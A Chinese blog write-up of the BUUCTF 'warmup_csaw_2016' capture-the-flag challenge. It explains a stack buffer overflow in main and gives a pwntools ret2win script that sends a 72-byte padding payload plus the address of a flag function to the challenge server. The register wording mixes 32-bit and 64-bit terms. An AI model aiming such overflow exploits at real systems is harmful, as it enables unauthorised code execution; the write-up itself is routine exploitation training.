buuctf.pwn.warmup_csaw_2016

发布时间 2023-03-23 11:53:24作者: redqx

首先检测
image

托进IDA,简单分析一下函数
main函数有个溢出漏洞
image

然后整体存在一个flag函数
image

通过main图片知道,变量v5的地址是ebp-0x40
而我们的攻击的地址是ebp+0x08
2个地址之间差距了72字节,然后我么还要写入8字节
所以payload

payload = b'Y' * (72)+p64(0x000000000040060D)

于是脚本如下

from pwn import *
p = remote('node4.buuoj.cn', 25743) 
payload = b'Y' * (72)+p64(0x000000000040060D)
p.sendline(payload)
p.interactive()